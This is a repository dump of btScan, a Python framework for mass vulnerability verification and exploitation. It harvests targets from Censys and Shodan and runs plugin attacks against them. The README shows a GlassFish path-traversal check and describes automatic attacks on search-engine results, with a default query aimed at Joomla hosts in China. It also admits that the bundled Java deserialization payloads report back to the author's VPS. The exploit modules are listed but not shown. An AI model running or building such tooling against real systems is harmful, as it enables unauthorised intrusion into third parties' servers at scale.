├── README.md
├── __init__.py
├── btScan.py
├── conf
│   └── scan_rule.ini
├── crawl
│   ├── NetSearch.py
│   ├── __init__.py
│   └── search_rule.ini
├── doc
│   ├── crawl.txt
│   ├── lib.txt
│   └── node.txt
├── lib
│   ├── __init__.py
│   ├── __init__.pyc
│   ├── cmdline.py
│   ├── cmdline.pyc
│   ├── include.py
│   ├── include.pyc
│   ├── ipparse.py
│   ├── ipparse.pyc
│   ├── report.py
│   ├── report.pyc
│   ├── scancore.py
│   ├── scancore.pyc
│   ├── scanframe.py
│   ├── scanframe.pyc
│   ├── scriptframe.py
│   └── scriptframe.pyc
├── node
│   ├── __init__.py
│   ├── __init__.pyc
│   ├── ext
│   │   ├── ParseUrl.py
│   │   ├── ParseUrl.pyc
│   │   ├── __init__.py
│   │   └── __init__.pyc
│   ├── fortigate.py
│   ├── fortigate.pyc
│   ├── glassfish.py
│   ├── glassfish.pyc
│   ├── gres_weak.py
│   ├── jboss_ser.py
│   ├── jboss_ser.pyc
│   ├── jenkins_ser.py
│   ├── joomla.py
│   ├── joomla.pyc
│   ├── juniperBackdoor.py
│   ├── redis_weak_ssh.py
│   ├── static
│   │   ├── jboss_poc.bin
│   │   ├── jenkins_poc.bin
│   │   ├── sshkey.txt
│   │   └── weblogic_poc.bin
│   ├── weblogic_ser.py
│   └── weblogic_ser.pyc
├── report
│   └── btscan_20151226_000414.html
├── requirements.txt
└── screenshot
    ├── exploit.png
    └── verify.png
/README.md:
--------------------------------------------------------------------------------
## Directory structure

--lib      core library

--report   folder where generated reports are saved

--node     each .py file inside is an attack vector; adding a scan node means adding a file here

--crawl    scripts that fetch urls or ips from cyberspace search engines


## Usage
```
python btScan.py
usage: btScan.py [options]

* batch vulnerability verification and exploitation framework. *
By he1m4n6a

optional arguments:
  -h, --help   show this help message and exit
  -t THREADS   Num of scan threads for each scan process, 20 by default
  -m MODE      select mode [config|script]
               e.g. -m script
  -n NAME      choose a script from the node folder
  -c COMMAND   give an instruction when using script mode [verify|exploit]
               e.g. -c verify
  -u URL_FILE  input url file
  -i IP_FILE   input ip file
  -autoIP      get ip from space search engine and auto attack
  -autoURL     get url from space search engine and auto attack
  -v           show program's version number and exit
```

The tool has two verification modes: one loads a module (script mode), the other reads a configuration file (config mode). Use a script for complex checks; a config file is enough for simple ones. Attacks likewise have two commands: verify (verification) and exploit (attack). Targets can be supplied as an ip file or a url file, or fetched automatically by combining the tool with the cyberspace search-engine crawler under the crawl folder.

**Examples**
```
python btScan.py -n joomla -m script -c verify -u url.txt
-n selects joomla.py under the node folder, -m script selects the module-loading mode, -c verify means verification only, and -u means the input file contains urls.
```
```
python btScan.py -n joomla -m script -c exploit -u url.txt
Same as above, but in exploit (attack) mode.
```
```
python btScan.py -m config -c verify -i ip.txt
-m config selects config mode, -c verify selects verification, and -i means the input file contains ips; configuring conf/scan_rule.ini is all that is needed.
```
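
The -autoIP / -autoURL modes are used the same way. As an illustration (this assumes you have first filled in your Censys/Shodan API keys in crawl/NetSearch.py, set a suitable query in crawl/search_rule.ini, and that the chosen node script can handle the targets your query returns):
```
python btScan.py -n joomla -m script -c verify -autoIP
Instead of reading targets from -u or -i, -autoIP (or -autoURL) pulls them from the configured cyberspace search engines.
```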


## Plugin writing rules

Just add a new .py file under the node folder.

The two functions that matter in the file are verify and exploit. If a plugin has no exploit (attack) mode, only verify is needed. verify returns three values: the first says whether the vulnerability exists (True or False), the second returns the url (the target), and the third returns the message to print.

***Example (glassfish.py)***

```
#!/usr/bin/env python
#coding=utf8

import requests

def verify(ip):
    url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/'
    try:
        r = requests.get(url, verify=False, timeout=5)
        if 'ejb-timer-service-app' in r.text:
            msg = 'vul'
            return True, ip, msg
        else:
            msg = 'safe'
            return False, ip, msg
    except Exception, e:
        #msg = str(e)
        msg = 'safe'
        return False, ip, msg


def exploit(ip):
    verify(ip)
```
The functions above can be written however you like; what matters is verify and exploit. If exploit does the same thing as verify, it only needs to call verify(url). A minimal skeleton you can start from is sketched at the end of this README.

## Other notes

Fill in your own Shodan and Censys API keys in NetSearch.py under the crawl folder.
Change the Java deserialization payloads yourself, otherwise the results are sent back to my VPS.

For any questions or discussion, contact me at he1m4n6a@163.com
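
As a starting point for new plugins, here is a minimal skeleton. It is only a sketch, not a file shipped with btScan: the module name, the request and the fingerprint check are placeholders to replace with your own logic.
```
#!/usr/bin/env python
#coding=utf8
# Minimal node plugin sketch. Save it as e.g. node/myplugin.py and run it with:
#   python btScan.py -n myplugin -m script -c verify -u url.txt

import requests

def verify(url):
    # must return (vulnerable or not, target, message to print)
    try:
        r = requests.get(url, timeout=5)
        if 'some fingerprint' in r.text:   # placeholder detection logic
            return True, url, 'vul'
        return False, url, 'safe'
    except Exception:
        return False, url, 'safe'

def exploit(url):
    # this sketch has no separate attack logic, so it just reuses verify()
    return verify(url)
```
The framework only relies on the (status, target, message) return convention described above; everything else inside the plugin file is up to you.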
--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/__init__.py
--------------------------------------------------------------------------------
/btScan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#coding=utf8

import os
import glob
import sys
from string import Template
import time
import webbrowser
from optparse import OptionParser
from lib.cmdline import parse_args
from lib.scancore import AbstractScan
from lib.report import TEMPLATE_html

args = parse_args()

def main():
    scanner = AbstractScan(args)
    scanner.run()

if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/conf/scan_rule.ini:
--------------------------------------------------------------------------------
[main]
scan_rule = Hello, world
res_rule =
payload = resin-doc/examples/quercus-hello/viewfile?file=hello.php
method = get
--------------------------------------------------------------------------------
/crawl/NetSearch.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#coding=utf8

import sys
import os
from censys import *
import censys
import shodan
import ConfigParser
sys.path.append('../lib')
import include

class CensysClass:
    #max request 120 times per 5 minutes.
    def __init__(self, querystr, start_page=1, max_page=10):
        self.api_id = ""
        self.api_secret = ""
        self.querystr = querystr
        self.START_PAGE = start_page
        self.MAX_PAGE = max_page

    #get ipv4 data
    def ipv4_data(self):
        reslist = []
        API_ID = self.api_id
        API_SECRET = self.api_secret
        try:
            api = censys.ipv4.CensysIPv4(api_id=API_ID, api_secret=API_SECRET)
            res = api.search(self.querystr)
            matches = res['metadata']['count']
            pageNum = matches / 100
            maxPageNum = pageNum
            if matches % 100 != 0:
                pageNum = pageNum + 1
            pageNum = self.MAX_PAGE if pageNum > self.MAX_PAGE else pageNum
            count = 1
            while count <= pageNum:
                if self.START_PAGE > maxPageNum:
                    break
                results = api.search(self.querystr, page=self.START_PAGE)
                count = count + 1
                self.START_PAGE = self.START_PAGE + 1
                for result in results.get('results'):
                    #rr = "{0}:{1}".format(result.get("ip"), result.get('protocols')[0].split('/')[0])
                    rr = "{0}".format(result.get("ip"))
                    reslist.append(str(rr))
            return reslist
            # print reslist
        except Exception, e:
            print str(e)

    #get website data
    def websites_data(self):
        reslist = []
        API_ID = self.api_id
        API_SECRET = self.api_secret
        try:
            api = censys.websites.CensysWebsites(api_id=API_ID, api_secret=API_SECRET)
            res = api.search(self.querystr)
            matches = res['metadata']['count']
            pageNum = matches / 100
            maxPageNum = pageNum
            if matches % 100 != 0:
                pageNum = pageNum + 1
            pageNum = self.MAX_PAGE if pageNum > self.MAX_PAGE else pageNum
            count = 1
            while count <= pageNum:
                if self.START_PAGE > maxPageNum:
                    break
                results = api.search(self.querystr, page=self.START_PAGE)
                count = count + 1
                self.START_PAGE = self.START_PAGE + 1
                for result in results.get('results'):
                    rr = result.get('domain')
                    reslist.append(str(rr))
            return reslist
            # print reslist
        except Exception, e:
            print str(e)

class ShodanClass:
    #Free users only 100 item with 1 pages
    def __init__(self, querystr, MAX_PAGE=1):
        self.SHODAN_API_KEY = ""
        self.querystr = querystr
        self.MAX_PAGE = MAX_PAGE

    def raw_data(self):
        SHODAN_API_KEY = self.SHODAN_API_KEY
        reslist = []
        try:
            api = shodan.Shodan(SHODAN_API_KEY)
            results = api.search(self.querystr, page=self.MAX_PAGE)
            for result in results['matches']:
                rr = "{0}:{1}".format(result['ip_str'], str(result['port']))
                reslist.append(str(rr))
            return reslist
            # print reslist
        except Exception, e:
            print str(e)


class NetSearch:
    def __init__(self):
        self.conf_file = include.search_rule_dir

    def getData(self):
        try:
            censys_list = []
            shodan_list = []
            cf = ConfigParser.ConfigParser()
            cf.read(self.conf_file)
            censys_items = cf.items("censys")
            shodan_items = cf.items("shodan")
            censys_start = censys_items[0][1]
            censys_mode = censys_items[1][1]
            censys_querystr = censys_items[2][1]
            censys_start_page = int(censys_items[3][1])
            censys_max_page = int(censys_items[4][1])
            shodan_start = shodan_items[0][1]
            shodan_querystr = shodan_items[1][1]
            shodan_max_page = int(shodan_items[2][1])
            # print censys_start, censys_mode, censys_querystr, censys_start_page, censys_max_page, shodan_start, shodan_querystr, shodan_max_page

            if censys_start == 'on':
                censys_class = CensysClass(censys_querystr, censys_start_page, censys_max_page)
                if censys_mode == "websites":
                    censys_list = censys_class.websites_data()
                elif censys_mode == "ipv4":
                    censys_list = censys_class.ipv4_data()
                else:
                    msg = "error args"
                    print msg
                    exit(0)
            if shodan_start == 'on':
                shodan_class = ShodanClass(shodan_querystr, shodan_max_page)
                shodan_list = shodan_class.raw_data()

            if censys_list and shodan_list:
                rset = set(censys_list+shodan_list)
                return rset
            elif censys_list:
                rset = set(censys_list)
                return rset
            elif shodan_list:
                rset = set(shodan_list)
                return rset
            else:
                msg = 'None result'
                print msg
                exit(0)
        except Exception, e:
            print str(e)

if __name__ == '__main__':
    fout = open('out.txt', 'w')
    netsearch = NetSearch()
    rset = netsearch.getData()
    if rset != None:
        for s in rset:
            fout.write(s+'\n')
    else:
        print 'rset is none'
        fout.close()
        sys.exit()
    print "\ntask all over.\n"
    fout.close()
--------------------------------------------------------------------------------
/crawl/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/crawl/__init__.py
--------------------------------------------------------------------------------
/crawl/search_rule.ini:
--------------------------------------------------------------------------------
[censys]
start = on
mode = ipv4
querystr = joomla AND location.country='China'
start_page = 1
max_page = 100

[shodan]
start = off
querystr = redis
max_page = 1
--------------------------------------------------------------------------------
/doc/crawl.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/crawl.txt
--------------------------------------------------------------------------------
/doc/lib.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/lib.txt
--------------------------------------------------------------------------------
/doc/node.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/node.txt
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/__init__.py
--------------------------------------------------------------------------------
/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/__init__.pyc
--------------------------------------------------------------------------------
/lib/cmdline.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#coding=utf8

import argparse
import sys
import os

p_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

def check_args(args):
    if not args.m:
        msg = 'Use -m to set attack Mode'
        raise Exception(msg)
    if args.m == 'config' and args.i:
        msg = 'Config mode not support ip format, please use -u'
    if args.autoIP and args.autoURL:
        msg = 'Only use one auto method'
        raise Exception(msg)
    if not args.autoIP and not args.autoURL:
        if not args.u and not args.i:
            msg = 'You should choose an auto method or assign a target file'
            raise Exception(msg)
        if args.u and args.i:
            msg = 'Only use -u or -i to assign a file'
            raise Exception(msg)
        if args.u and not os.path.isfile(args.u):
            msg = 'TargetFile not found: %s' %args.u
            raise Exception(msg)
        if args.i and not os.path.isfile(args.i):
            msg = 'TargetFile not found: %s' %args.i
            raise Exception(msg)
    if args.m == 'script' and not args.n:
        msg = 'Use -n to choose a script from the node folder'
        raise Exception(msg)
    if args.n and not os.path.isfile(p_path + os.sep + 'node' + os.sep + args.n + '.py'):
        msg = 'Script name not found: %s.py' %args.n
        raise Exception(msg)
    if args.c not in ('verify', 'exploit'):
        msg = 'Use -c to choose a correct command'
        raise Exception(msg)

def parse_args():
    parser = argparse.ArgumentParser(prog='btScan',
        formatter_class=argparse.RawTextHelpFormatter,
        description='* batch vulnerability verification and exploitation framework. *\nBy he1m4n6a',
        usage='btScan.py [options]')
    parser.add_argument('-t', metavar='THREADS', type=int, default=20,
        help='Num of scan threads for each scan process, 20 by default')
    parser.add_argument('-m', metavar='MODE', type=str, default='',
        help='select mode [config|script] \ne.g. -m script')
    parser.add_argument('-n', metavar='NAME', type=str,
        help='choose a script from the node folder')
    parser.add_argument('-c', metavar='COMMAND', type=str, default='verify',
        help='give an instruction when using script mode [verify|exploit]\ne.g. -c verify')
    parser.add_argument('-u', metavar='URL_FILE', type=str, default='',
        help='input url file')
    parser.add_argument('-i', metavar='IP_FILE', type=str, default='',
        help='input ip file')
    parser.add_argument('-autoIP', action='store_true',
        help='get ip from space search engine and auto attack')
    parser.add_argument('-autoURL', action='store_true',
        help='get url from space search engine and auto attack')
    parser.add_argument('-v', action='version', version='%(prog)s 1.0 By he1m4n6a')

    if len(sys.argv) == 1:
        sys.argv.append('-h')
    args = parser.parse_args()
    check_args(args)
    return args
--------------------------------------------------------------------------------
/lib/cmdline.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/cmdline.pyc
--------------------------------------------------------------------------------
/lib/include.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#coding=utf8

import os
import sys

p_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
lib_dir = os.path.dirname(os.path.abspath(__file__))
scan_rule_dir = p_dir + os.path.sep + "conf" + os.path.sep + "scan_rule.ini"
crawl_dir = p_dir + os.path.sep + "crawl"
search_rule_dir = crawl_dir + os.path.sep + 'search_rule.ini'

sys.path.append(p_dir)
sys.path.append(lib_dir)
sys.path.append(crawl_dir)
sys.path.append(search_rule_dir)
--------------------------------------------------------------------------------
/lib/include.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/include.pyc
--------------------------------------------------------------------------------
/lib/ipparse.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#coding=utf8

#parse ip
class Ipparse():
    # convert an IP address from its dotted-quad format to its
    # 32 binary digit representation
    def __init__(self):
        pass

    # convert a decimal number to binary representation
    # if d is specified, left-pad the binary number with 0s to that length
    @staticmethod
    def dec2bin(n,d=None):
        s = ""
        while n>0:
            if n&1:
                s = "1"+s
            else:
                s = "0"+s
            n >>= 1
        if d is not None:
            while len(s) < d:
                s = "0"+s
        return s

    # convert a dotted-quad IP address into its 32-bit binary string
    @staticmethod
    def ip2bin(ip):
        b = ""
        inQuads = ip.split(".")
        outQuads = 4
        for q in inQuads:
            if q != "":
                b += Ipparse.dec2bin(int(q), 8)
                outQuads -= 1
        while outQuads > 0:
            b += "00000000"
            outQuads -= 1
        return b

    # convert a binary string into an IP address
    @staticmethod
    def bin2ip(b):
        ip = ""
        for i in range(0,len(b),8):
            ip += str(int(b[i:i+8],2))+"."
        return ip[:-1]

    # print a list of IP addresses based on the CIDR block specified
    @staticmethod
    def listCIDR(c):
        cidrlist = []
        if c.find('-') == -1:
            parts = c.split("/")
            baseIP = Ipparse.ip2bin(parts[0])
            subnet = int(parts[1])
            if subnet == 32:
                cidrlist.append(Ipparse.bin2ip(baseIP))
                return cidrlist
            elif subnet > 32:
                return []
            else:
                ipPrefix = baseIP[:-(32-subnet)]
                for i in range(2**(32-subnet)):
                    cidrlist.append(Ipparse.bin2ip(ipPrefix+Ipparse.dec2bin(i, (32-subnet))))
                return cidrlist
        else:
            parts = c.split('-')
            baseIP = parts[0].split('.')
            iptmp = baseIP[0] + '.' + baseIP[1] + '.' + baseIP[2] + '.'
            startIP = baseIP[3]
            endIP = parts[1]
            for a in range(int(startIP), int(endIP)+1):
                ipNew = iptmp + str(a)
                cidrlist.append(ipNew)
            return cidrlist
--------------------------------------------------------------------------------
/lib/ipparse.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/ipparse.pyc
--------------------------------------------------------------------------------
/lib/report.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#coding=utf8

TEMPLATE_html = """

btScan Report


btscan v1.0 scan report